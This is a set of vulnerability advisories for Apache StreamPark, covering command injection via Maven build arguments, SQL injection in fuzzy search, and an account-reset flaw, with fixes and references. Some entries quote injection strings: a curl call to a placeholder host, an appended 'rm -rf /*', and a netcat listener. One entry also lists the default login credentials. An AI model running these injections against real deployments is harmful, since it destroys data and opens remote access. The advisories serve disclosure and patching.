CVE-2024-29737 – Apache StreamPark (incubating): maven build params could trigger remote command execution
https://notcve.org/view.php?id=CVE-2024-29737
In StreamPark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution. The prerequisite for a successful attack is that the user needs to log in to the StreamPark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.
Mitigation: all users should upgrade to 2.1.4.
Background info: Log in to StreamPark using the default username (e.g. test1, test2, test3) and the default password (streampark). Navigate to the Project module, then add a new project.
• http://www.openwall.com/lists/oss-security/2024/07/17/2
• https://lists.apache.org/thread/xhx7jt1t24s6d7o435wxng8t0ojfbfh5
• CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
CVE-2023-52291 – Apache StreamPark (incubating): Unchecked maven build params could trigger remote command execution
https://notcve.org/view.php?id=CVE-2023-52291
In StreamPark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution. The prerequisite for a successful attack is that the user needs to log in to the StreamPark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.
Background: In the "Project" module, the "<" operator in the Maven build args causes command injection, e.g. "< (curl http://xxx.com )" will be executed as a command injection.
Mitigation: all users should upgrade to 2.1.4. The "<" operator will be blocked.
• http://www.openwall.com/lists/oss-security/2024/07/17/1
• https://lists.apache.org/thread/pl6xgzoqrl4kcn0nt55zjbsx8dn80mkf
• CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
CVE-2023-30867 – Apache StreamPark (incubating): Authenticated system users could trigger SQL injection vulnerability
https://notcve.org/view.php?id=CVE-2023-30867
In the StreamPark platform, when users log in to the system and use certain features, some pages provide a name-based fuzzy search, such as job names, role names, etc. The SQL syntax is: select * from table where jobName like '%jobName%'. However, the jobName field may receive illegal parameters, leading to SQL injection. This could potentially result in information leakage.
Mitigation: Users are recommended to upgrade to version 2.1.2, which fixes the issue.
• https://lists.apache.org/thread/bhdzh6hnh04yyf3g203bbyvxryd720o2
• CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
CVE-2023-49898 – Apache StreamPark (incubating): Authenticated system users could trigger remote command execution
https://notcve.org/view.php?id=CVE-2023-49898
In StreamPark, there is a project module that integrates Maven's compilation capability. However, there is no check on the compilation parameters of Maven, allowing attackers to insert commands for remote command execution. The prerequisite for a successful attack is that the user needs to log in to the StreamPark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.
Mitigation: all users should upgrade to 2.1.2.
Example:
## You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &&, compilation failure use "||" or "&&":
/usr/share/java/maven-3/conf/settings.xml || rm -rf /*
/usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &
• https://lists.apache.org/thread/qj99c03r4td35f8gbxq084b8qmv2fyr3
• CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
CVE-2022-46365 – Apache StreamPark (incubating): Logic error causing any account reset
https://notcve.org/view.php?id=CVE-2022-46365
In Apache StreamPark 1.0.0 before 2.0.0, when a user successfully logs in and modifies their profile, the username is passed to the server layer as a parameter, but it is not verified whether the username is that of the currently logged-in user and whether the user is legal. This allows malicious attackers to send any username to modify and reset the account. Users of the affected versions should upgrade to Apache StreamPark 2.0.0 or later.
• https://lists.apache.org/thread/f68lcwrp8pcdc4yrbpcm8j7m0f5mjn7h
• CWE-20: Improper Input Validation